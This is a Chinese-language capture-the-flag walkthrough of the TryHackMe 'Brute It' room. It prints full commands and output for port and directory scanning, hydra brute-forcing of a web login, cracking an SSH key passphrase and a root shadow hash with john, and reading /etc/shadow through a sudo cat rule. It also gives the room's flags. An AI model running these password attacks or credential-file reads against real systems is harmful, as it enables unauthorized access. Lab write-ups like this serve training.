【Tryhackme】Brute It(各种暴力破解)

服务探测

┌──(root?kali)-[~/tryhackme] └─# nmap -sV -Pn 10.10.218.99      Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-08 03:18 EDT Nmap scan report for 10.10.218.99 Host is up (0.34s latency). Not shown: 998 closed ports PORT   STATE SERVICE VERSION 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 85.58 seconds

目录爆破

┌──(root?kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.218.99   _|. _ _  _  _  _ _|_    v0.3.8 (_||| _) (/_(_|| (_| )  Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521  Error Log: /root/dirsearch/logs/errors-21-10-08_03-18-54.log  Target: http://10.10.218.99  [03:18:55] Starting:  [03:18:57] 200 -   11KB - / [03:19:03] 301 -  312B  - /admin  ->  http://10.10.218.99/admin/ [03:25:33] 403 -  277B  - /server-status   

/admin源代码有一行注释

Hey john, if you do not remember, the username is admin

所以我们现在知道登录的账号名是:admin，ssh的用户名是：john

用hydra爆破登录密码

┌──(root?kali)-[~/tryhackme/bruteit] └─# hydra -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.218.99 http-post-form "/admin/:user=admin&pass=^PASS^&submit=LOGIN:Username or password invalid" -I -v Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-08 03:36:32 [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://10.10.218.99:80/admin/:user=admin&pass=^PASS^&submit=LOGIN:Username or password invalid [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [VERBOSE] Page redirected to http://10.10.218.99/admin/panel [VERBOSE] Page redirected to http://10.10.218.99/admin/panel/ [80][http-post-form] host: 10.10.218.99   login: admin   password: xavier [STATUS] attack finished for 10.10.218.99 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-08 03:37:31

现在我们得到了登录凭证admin:xavier

登录后拿到webflag
THM{brut3_f0rce_is_e4sy}

把登录页面的rsa复制下来，在本地保存成文件id_rsa

用ssh2john把rsa改成john能识别的哈希

┌──(root?kali)-[~/tryhackme/bruteit] └─# locate ssh2john.py                 /usr/share/john/ssh2john.py                                                                                                                                                                                                                                              ┌──(root?kali)-[~/tryhackme/bruteit] └─# /usr/share/john/ssh2john.py id_rsa >rsacrack

john开始破解

┌──(root?kali)-[~/tryhackme/bruteit] └─# john --wordlist=/usr/share/wordlists/rockyou.txt rsacrack Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status rockinroll       (id_rsa) 1g 0:00:00:04 61.87% (ETA: 03:49:13) 0.2493g/s 2222Kp/s 2222Kc/s 2222KC/s crj316..crizzy19 Warning: Only 2 candidates left, minimum 4 needed for performance. 1g 0:00:00:07 DONE (2021-10-08 03:49) 0.1336g/s 1917Kp/s 1917Kc/s 1917KC/sa6_123..*7¡Vamos! Session completed

得到rsa密码：rockinroll

登录ssh拿到user.txt

┌──(root?kali)-[~/tryhackme/bruteit] └─# chmod 600 id_rsa                                                                                                                                                                                                                  130 ⨯                                                                                                                                                                                                                                              ┌──(root?kali)-[~/tryhackme/bruteit] └─# ssh -i id_rsa john@10.10.218.99 Enter passphrase for key 'id_rsa':  Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)   * Documentation:  https://help.ubuntu.com  * Management:     https://landscape.canonical.com  * Support:        https://ubuntu.com/advantage    System information as of Fri Oct  8 07:51:11 UTC 2021    System load:  0.0                Processes:           104   Usage of /:   25.8% of 19.56GB   Users logged in:     0   Memory usage: 24%                IP address for eth0: 10.10.218.99   Swap usage:   0%   63 packages can be updated. 0 updates are security updates.   Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106 john@bruteit:~$ ls user.txt john@bruteit:~$ cat user.txt THM{a_password_is_not_a_barrier} 

sudo -l查看本账号root权限

john@bruteit:~$ sudo -l Matching Defaults entries for john on bruteit:     env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin  User john may run the following commands on bruteit:     (root) NOPASSWD: /bin/cat

直接查看shadow文件

john@bruteit:~$ sudo cat /etc/shadow root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7::: daemon:*:18295:0:99999:7::: bin:*:18295:0:99999:7::: sys:*:18295:0:99999:7::: sync:*:18295:0:99999:7::: games:*:18295:0:99999:7::: man:*:18295:0:99999:7::: lp:*:18295:0:99999:7::: mail:*:18295:0:99999:7::: news:*:18295:0:99999:7::: uucp:*:18295:0:99999:7::: proxy:*:18295:0:99999:7::: www-data:*:18295:0:99999:7::: backup:*:18295:0:99999:7::: list:*:18295:0:99999:7::: irc:*:18295:0:99999:7::: gnats:*:18295:0:99999:7::: nobody:*:18295:0:99999:7::: systemd-network:*:18295:0:99999:7::: systemd-resolve:*:18295:0:99999:7::: syslog:*:18295:0:99999:7::: messagebus:*:18295:0:99999:7::: _apt:*:18295:0:99999:7::: lxd:*:18295:0:99999:7::: uuidd:*:18295:0:99999:7::: dnsmasq:*:18295:0:99999:7::: landscape:*:18295:0:99999:7::: pollinate:*:18295:0:99999:7::: thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7::: sshd:*:18489:0:99999:7::: john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::

把root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.复制到本地，保存成一个hash.txt文件

再次用john破解

┌──(root?kali)-[~/tryhackme/bruteit] └─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status football         (root) 1g 0:00:00:00 DONE (2021-10-08 03:58) 5.555g/s 1422p/s 1422c/s 1422C/s 123456..freedom Use the "--show" option to display all of the cracked passwords reliably Session completed 

拿到root凭证：root:football

登录root账户，拿到root flag

john@bruteit:~$ su root Password:  root@bruteit:/home/john# cat /root/root.txt  THM{pr1v1l3g3_3sc4l4t10n} root@bruteit:/home/john# 

总结

很简单的机器，主要考察各种暴力破解工具的使用。

[温馨提示：高防服务器能助您降低 IT 成本，提升运维效率，使您更专注于核心业务创新。]

[图文来源于网络，不代表本站立场，如有侵权，请联系高防服务器网删除]